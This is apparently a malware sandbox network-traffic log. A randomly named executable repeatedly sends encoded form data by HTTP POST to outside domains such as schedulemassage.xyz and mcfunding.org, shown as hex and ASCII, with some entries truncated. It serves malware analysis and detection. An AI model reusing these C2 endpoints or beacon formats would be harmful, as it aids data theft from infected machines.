72 [TRUNCATED]
                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49990 | 203.161.49.193 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:40:19.932594061 CET | 554 | OUT | GET /hxmz/?DDp=xeYt+TVrluKccowhuJaDBktUUZBiwtnijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H768cQaPGnwmWpoBoTXnujTk0fw5ooQYelqhpppqeWfG8SjK30Qts=&SvrLY=3P8lALA HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.futurevision.life
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 6, 2024 08:40:20.633265972 CET | 548 | IN | HTTP/1.1 404 Not Found
Date: Wed, 06 Nov 2024 07:40:20 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49991 | 3.33.130.190 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:40:25.759612083 CET | 828 | OUT | POST /slxp/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.schedulemassage.xyz
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 208
Cache-Control: no-cache
Origin: http://www.schedulemassage.xyz
Referer: http://www.schedulemassage.xyz/slxp/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 64 70 2b 4d 32 37 4f 7a 59 42 55 42 67 49 50 2b 59 57 57 6b 71 55 59 61 48 4f 42 5a 33 2b 32 69 6d 51 56 2f 41 4c 35 6d 68 39 36 6f 6e 69 69 34 71 78 52 54 42 36 6f 41 50 56 4b 4b 54 6d 46 69 61 2b 59 4d 53 6c 75 52 35 43 45 63 4e 4e 6d 52 75 4a 5a 46 33 74 6f 4b 6e 61 69 49 77 58 36 71 7a 72 65 59 44 6e 73 4e 72 6d 49 45 62 6d 2b 51 4d 57 65 36 53 5a 6e 5a 6c 35 42 41 62 61 42 71 4a 54 7a 64 31 6e 68 51 6a 65 5a 4f 69 79 55 59 32 61 76 35 4d 2f 38 47 59 79 33 66 6a 35 76 70 57 6e 36 33 4a 54 58 57 63 65 31 66 32 42 5a 37 41 2b 70 71 7a 65 31 78 44 72 35 39 4e 41 55 59 34 5a 32 78 4a 6f 4f 31 38 4d 50 5a
                                                                                                        Data Ascii: DDp=dp+M27OzYBUBgIP+YWWkqUYaHOBZ3+2imQV/AL5mh96onii4qxRTB6oAPVKKTmFia+YMSluR5CEcNNmRuJZF3toKnaiIwX6qzreYDnsNrmIEbm+QMWe6SZnZl5BAbaBqJTzd1nhQjeZOiyUY2av5M/8GYy3fj5vpWn63JTXWce1f2BZ7A+pqze1xDr59NAUY4Z2xJoO18MPZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49993 | 3.33.130.190 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:40:28.310998917 CET | 852 | OUT | POST /slxp/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.schedulemassage.xyz
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 232
Cache-Control: no-cache
Origin: http://www.schedulemassage.xyz
Referer: http://www.schedulemassage.xyz/slxp/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 64 70 2b 4d 32 37 4f 7a 59 42 55 42 68 70 2f 2b 64 78 43 6b 6a 55 59 46 43 4f 42 5a 39 65 33 72 6d 51 70 2f 41 4b 4e 4d 68 76 65 6f 6e 47 75 34 34 45 74 54 41 36 6f 41 58 46 4c 41 58 6d 46 31 61 2b 55 69 53 68 6d 52 35 43 41 63 4e 4a 69 52 75 36 78 47 74 64 6f 49 75 36 69 4f 39 33 36 71 7a 72 65 59 44 6a 45 72 72 6d 51 45 62 32 75 51 4e 30 6d 35 4e 70 6e 65 69 35 42 41 52 36 42 75 4a 54 7a 6a 31 69 34 59 6a 63 68 4f 69 33 77 59 32 4c 76 2b 44 2f 39 4e 63 79 32 30 6b 34 53 51 53 55 6a 4e 48 42 2f 4f 42 59 5a 4f 7a 33 45 68 63 4e 70 4a 68 4f 56 7a 44 70 68 50 4e 67 55 79 36 5a 4f 78 62 2f 43 53 7a 34 71 36 70 35 41 49 64 44 70 2b 72 62 6f 4a 4d 48 30 6b 65 30 68 71 74 67 3d 3d
                                                                                                        Data Ascii: DDp=dp+M27OzYBUBhp/+dxCkjUYFCOBZ9e3rmQp/AKNMhveonGu44EtTA6oAXFLAXmF1a+UiShmR5CAcNJiRu6xGtdoIu6iO936qzreYDjErrmQEb2uQN0m5Npnei5BAR6BuJTzj1i4YjchOi3wY2Lv+D/9Ncy20k4SQSUjNHB/OBYZOz3EhcNpJhOVzDphPNgUy6ZOxb/CSz4q6p5AIdDp+rboJMH0ke0hqtg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 49994 | 3.33.130.190 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:40:31.159502029 CET | 1865 | OUT | POST /slxp/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.schedulemassage.xyz
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1244
Cache-Control: no-cache
Origin: http://www.schedulemassage.xyz
Referer: http://www.schedulemassage.xyz/slxp/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 64 70 2b 4d 32 37 4f 7a 59 42 55 42 68 70 2f 2b 64 78 43 6b 6a 55 59 46 43 4f 42 5a 39 65 33 72 6d 51 70 2f 41 4b 4e 4d 68 76 57 6f 6e 7a 79 34 70 58 46 54 44 36 6f 41 4a 56 4c 44 58 6d 45 33 61 2b 4d 75 53 68 69 72 35 45 63 63 4d 71 71 52 6f 4c 78 47 6a 74 6f 49 73 36 69 50 77 58 36 46 7a 72 4f 55 44 6e 67 72 72 6d 51 45 62 77 53 51 62 57 65 35 65 35 6e 5a 6c 35 42 63 62 61 42 47 4a 54 37 73 31 6a 4d 49 69 73 42 4f 6a 58 41 59 77 35 58 2b 63 50 39 50 62 79 32 73 6b 34 65 78 53 58 48 37 48 46 2f 77 42 65 6c 4f 78 52 35 4b 44 2b 6c 77 2f 4d 46 75 65 65 6b 6b 4b 6c 38 61 69 50 61 4d 66 73 4b 6b 78 5a 57 78 75 73 70 56 57 31 30 62 6a 38 30 69 53 68 56 44 53 6b 77 61 37 54 6b 34 4f 66 57 31 73 46 4d 50 69 34 50 6f 72 66 37 4d 41 4e 36 62 67 44 4b 37 6b 52 56 59 70 37 67 48 6b 33 6f 36 42 53 62 46 37 5a 4a 41 6f 7a 30 36 45 41 6d 38 58 4a 7a 32 35 77 76 59 78 4d 75 45 2f 41 67 6d 64 49 57 6b 46 39 66 44 37 39 78 66 36 34 57 4f 61 50 63 36 35 68 65 39 69 47 38 4e 74 36 6f 7a 58 30 75 41 43 63 [TRUNCATED]
                                                                                                        Data Ascii: DDp=dp+M27OzYBUBhp/+dxCkjUYFCOBZ9e3rmQp/AKNMhvWonzy4pXFTD6oAJVLDXmE3a+MuShir5EccMqqRoLxGjtoIs6iPwX6FzrOUDngrrmQEbwSQbWe5e5nZl5BcbaBGJT7s1jMIisBOjXAYw5X+cP9Pby2sk4exSXH7HF/wBelOxR5KD+lw/MFueekkKl8aiPaMfsKkxZWxuspVW10bj80iShVDSkwa7Tk4OfW1sFMPi4Porf7MAN6bgDK7kRVYp7gHk3o6BSbF7ZJAoz06EAm8XJz25wvYxMuE/AgmdIWkF9fD79xf64WOaPc65he9iG8Nt6ozX0uACczOp01fFQY6rRVSB/Zyf8CqsDbpl+MXwtW6O7qRa2ZiznSXugUw0cdMW09V2w699TDEP0lF6mRbfwOprrmV3PV+/4I/k5K1LpI8ZBMmco4G405pgpeAHCXhkVbDsYauMmiTefod+5OAPbFIpbejBqKVX2ESzlLu7I+99oLknD7e6CTHYD6A2HrYaUdSqEahYvNbMtFJW0XRWjw4uWUb8J2I7Snv3m9Fr5i0bwUPmA1rg3IBMrbiTxRHJwl8xZcD2eSjm63c3kTKBdKIS2FedZPrBWv7KXu2i/nT1xL46GkwwpCIS7khin/ZSpM/MvOjP0VB+SMTO2aC7Z7Oh1O4CYnCCKIDzBNeYpwmbVOzmw0OQY4+2CgWBDvQ89HTHzqhpQmcBYzeZG7eQwEsGFWudQFWXJI4eMsfIjM0+d1mYaNZu0i3d8DBZ+XRR7he81yrJ+6Sr0n0RsOVnekvO83NKxUo9p66C0jif4Mu41r6MWdy7hCkG84XmgxzIsZiZEWsSwAxbulo3WbcjKSvIMzIqHPYt+GvV9WI/fSeB7umxlIEIx39flyFEpGcGzyZXykMBP/HKeD9rTF7+axKu5/uAucqCmuCcwze5+l5A/4l5xfrTIuEmfshXMpLxpWaaF58ramB2TqhHSpe1nf6U8IJZZYfXZh1Stc3tZct [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49995 | 3.33.130.190 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe

Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:40:33.744096994 CET | 556 | OUT | GET /slxp/?DDp=QrWs1MGbYyQFoq3pAiasxQ0vJYE0z/vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOifcAo6/043Os1binCTsQtgQiE2XfHHikdfzfjKFZR+NqLzPU/Xw=&SvrLY=3P8lALA HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.schedulemassage.xyz
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 6, 2024 08:40:34.354901075 CET | 409 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Wed, 06 Nov 2024 07:40:34 GMT
Content-Type: text/html
Content-Length: 269
Connection: close
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 44 44 70 3d 51 72 57 73 31 4d 47 62 59 79 51 46 6f 71 33 70 41 69 61 73 78 51 30 76 4a 59 45 30 7a 2f 76 61 77 54 5a 65 65 49 31 69 38 74 6d 38 6b 78 65 4e 34 6d 52 61 49 5a 51 71 44 6d 53 72 65 31 41 7a 4e 39 73 49 65 47 2b 50 78 51 34 31 45 4c 2b 58 71 6f 6c 4f 69 66 63 41 6f 36 2f 30 34 33 4f 73 31 62 69 6e 43 54 73 51 74 67 51 69 45 32 58 66 48 48 69 6b 64 66 7a 66 6a 4b 46 5a 52 2b 4e 71 4c 7a 50 55 2f 58 77 3d 26 53 76 72 4c 59 3d 33 50 38 6c 41 4c 41 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?DDp=QrWs1MGbYyQFoq3pAiasxQ0vJYE0z/vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOifcAo6/043Os1binCTsQtgQiE2XfHHikdfzfjKFZR+NqLzPU/Xw=&SvrLY=3P8lALA"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49996 | 3.33.130.190 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe

Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:40:39.417275906 CET | 810 | OUT | POST /0598/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.mcfunding.org
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 208
Cache-Control: no-cache
Origin: http://www.mcfunding.org
Referer: http://www.mcfunding.org/0598/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 67 34 55 68 4f 45 4e 67 4d 38 54 6f 2b 4a 61 35 5a 30 6f 6d 6e 72 43 53 4a 78 65 5a 58 72 43 49 4e 65 6b 76 44 6a 6b 56 6e 35 4c 58 73 4b 58 4f 61 49 54 63 58 44 71 76 66 6a 4a 71 42 71 6e 7a 37 59 4a 4d 65 69 32 41 30 72 53 6f 72 65 46 2f 75 48 62 49 66 64 66 76 69 42 33 4f 54 50 64 64 71 78 31 2f 4a 6b 32 76 5a 46 64 6a 33 6a 67 76 37 45 74 33 52 6d 30 77 71 48 79 77 56 57 6b 70 6a 64 6c 48 42 57 51 72 41 52 51 52 69 77 2f 38 33 4b 6e 78 37 42 32 6e 48 72 34 62 38 31 30 67 76 37 77 6d 6e 57 36 4e 38 5a 4d 63 53 79 53 77 49 2f 56 34 79 69 6a 2f 43 64 63 36 2f 73 46 4e 61 57 32 75 5a 2b 76 59 4a 61 2b 4c
                                                                                                        Data Ascii: DDp=g4UhOENgM8To+Ja5Z0omnrCSJxeZXrCINekvDjkVn5LXsKXOaITcXDqvfjJqBqnz7YJMei2A0rSoreF/uHbIfdfviB3OTPddqx1/Jk2vZFdj3jgv7Et3Rm0wqHywVWkpjdlHBWQrARQRiw/83Knx7B2nHr4b810gv7wmnW6N8ZMcSySwI/V4yij/Cdc6/sFNaW2uZ+vYJa+L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 49997 | 3.33.130.190 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe

Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:40:41.980679035 CET | 834 | OUT | POST /0598/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.mcfunding.org
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 232
Cache-Control: no-cache
Origin: http://www.mcfunding.org
Referer: http://www.mcfunding.org/0598/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 67 34 55 68 4f 45 4e 67 4d 38 54 6f 2b 70 71 35 62 56 6f 6d 68 4c 43 56 55 42 65 5a 64 4c 43 45 4e 65 67 76 44 69 78 4b 6b 4b 2f 58 69 49 2f 4f 62 4b 37 63 51 44 71 76 51 44 4a 7a 46 71 6d 65 37 5a 30 6d 65 6a 61 41 30 72 47 6f 72 63 74 2f 70 30 44 4c 5a 4e 66 74 76 68 33 49 51 2f 64 64 71 78 31 2f 4a 67 66 79 5a 46 56 6a 33 54 51 76 35 6c 74 30 63 47 30 33 70 48 79 77 43 47 6b 74 6a 64 6c 78 42 54 78 41 41 54 6f 52 69 78 76 38 33 62 6e 32 77 42 32 68 44 72 34 4c 78 58 6b 77 76 59 49 69 67 41 36 68 6e 49 41 55 58 45 50 71 55 4d 56 62 67 79 44 39 43 66 45 49 2f 4d 46 6e 59 57 4f 75 4c 70 6a 2f 47 75 62 6f 52 67 68 33 47 77 68 47 71 32 39 70 41 4e 47 54 61 51 57 48 6a 51 3d 3d
                                                                                                        Data Ascii: DDp=g4UhOENgM8To+pq5bVomhLCVUBeZdLCENegvDixKkK/XiI/ObK7cQDqvQDJzFqme7Z0mejaA0rGorct/p0DLZNftvh3IQ/ddqx1/JgfyZFVj3TQv5lt0cG03pHywCGktjdlxBTxAAToRixv83bn2wB2hDr4LxXkwvYIigA6hnIAUXEPqUMVbgyD9CfEI/MFnYWOuLpj/GuboRgh3GwhGq29pANGTaQWHjQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 49998 | 3.33.130.190 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe

Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:40:44.573451996 CET | 1847 | OUT | POST /0598/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.mcfunding.org
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1244
Cache-Control: no-cache
Origin: http://www.mcfunding.org
Referer: http://www.mcfunding.org/0598/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 67 34 55 68 4f 45 4e 67 4d 38 54 6f 2b 70 71 35 62 56 6f 6d 68 4c 43 56 55 42 65 5a 64 4c 43 45 4e 65 67 76 44 69 78 4b 6b 4b 6e 58 69 35 66 4f 61 72 37 63 52 44 71 76 5a 6a 4a 32 46 71 6d 6d 37 59 63 69 65 6a 47 51 30 70 2b 6f 71 2f 56 2f 6f 46 44 4c 58 4e 66 74 7a 52 33 4a 54 50 64 4d 71 78 6c 7a 4a 6b 44 79 5a 46 56 6a 33 56 55 76 33 6b 74 30 65 47 30 77 71 48 79 73 56 57 6c 34 6a 64 64 68 42 54 38 37 41 69 49 52 69 51 66 38 34 4a 50 32 79 68 32 6a 4f 4c 35 55 78 58 70 33 76 59 46 5a 67 41 6d 4c 6e 4b 63 55 58 43 2b 4a 4b 5a 31 30 6a 79 62 53 42 63 4d 43 2f 35 41 55 53 56 69 77 4c 61 53 58 49 76 6e 44 56 77 70 2b 49 68 45 69 6a 56 31 57 4f 6f 69 41 52 42 76 65 68 59 75 5a 48 7a 57 49 53 6a 6a 32 76 71 74 44 39 69 78 57 49 55 32 34 69 74 55 42 50 6d 6d 55 31 75 73 4b 71 72 6d 4e 4d 56 52 74 56 34 65 34 74 7a 69 47 71 67 47 6a 71 54 45 71 6d 52 42 37 75 5a 52 64 39 79 66 41 50 41 53 6d 54 64 68 55 31 64 48 42 51 4f 69 39 39 50 47 2f 6d 33 6c 62 67 2b 32 79 56 6a 37 72 46 54 66 55 64 39 [TRUNCATED]
                                                                                                        Data Ascii: DDp=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 [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 49999 | 3.33.130.190 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe

Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:40:47.255166054 CET | 550 | OUT | GET /0598/?SvrLY=3P8lALA&DDp=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4Tu+XiR6NXotGry9ANEeeRCoN4FhbxnBZSnIhm0SzK0MisIZlDjM= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.mcfunding.org
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 6, 2024 08:40:47.886740923 CET | 409 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Wed, 06 Nov 2024 07:40:47 GMT
Content-Type: text/html
Content-Length: 269
Connection: close
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 53 76 72 4c 59 3d 33 50 38 6c 41 4c 41 26 44 44 70 3d 74 36 38 42 4e 30 39 69 56 65 71 62 2f 49 75 4c 46 31 6f 61 37 4c 47 44 4f 30 37 2f 57 37 43 46 49 6f 6f 63 48 51 73 33 6c 6f 7a 71 67 36 50 69 45 34 69 72 5a 42 2b 64 56 6b 52 63 4e 4b 6e 33 71 71 59 54 66 7a 2b 55 32 4b 4b 73 6b 64 52 73 76 47 76 34 54 75 2b 58 69 52 36 4e 58 6f 74 47 72 79 39 41 4e 45 65 65 52 43 6f 4e 34 46 68 62 78 6e 42 5a 53 6e 49 68 6d 30 53 7a 4b 30 4d 69 73 49 5a 6c 44 6a 4d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?SvrLY=3P8lALA&DDp=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4Tu+XiR6NXotGry9ANEeeRCoN4FhbxnBZSnIhm0SzK0MisIZlDjM="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 50000 | 198.252.98.54 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe

Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:40:53.007347107 CET | 822 | OUT | POST /y3dc/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.migorengya8.click
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 208
Cache-Control: no-cache
Origin: http://www.migorengya8.click
Referer: http://www.migorengya8.click/y3dc/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 76 6a 6a 6d 61 58 57 74 79 6d 74 75 69 77 4d 7a 34 58 74 7a 71 46 51 54 68 36 69 76 77 6b 4a 38 68 4b 46 36 30 33 42 51 33 6e 4b 4b 2b 4d 6f 70 38 55 42 71 4f 70 70 63 66 33 76 70 61 47 72 52 4e 31 6e 63 69 44 38 6b 53 46 39 39 63 4d 62 42 2b 4d 70 4d 66 54 6a 70 79 2b 35 6d 36 52 6f 78 41 76 38 71 6e 44 6a 47 61 34 78 68 48 51 71 51 32 65 35 42 62 49 39 38 30 30 49 52 51 37 30 69 31 49 50 4d 2f 4a 66 32 45 35 4b 63 4d 75 73 49 68 52 4d 32 56 56 62 4d 4b 70 51 71 65 53 37 43 4e 59 33 4b 71 78 54 48 34 56 4a 4c 63 74 73 31 4f 5a 6e 4c 57 6a 6d 76 37 43 49 2f 4e 4f 59 43 75 4e 41 73 76 6d 74 4d 4d 32 67 73
                                                                                                        Data Ascii: DDp=vjjmaXWtymtuiwMz4XtzqFQTh6ivwkJ8hKF603BQ3nKK+Mop8UBqOppcf3vpaGrRN1nciD8kSF99cMbB+MpMfTjpy+5m6RoxAv8qnDjGa4xhHQqQ2e5BbI9800IRQ70i1IPM/Jf2E5KcMusIhRM2VVbMKpQqeS7CNY3KqxTH4VJLcts1OZnLWjmv7CI/NOYCuNAsvmtMM2gs
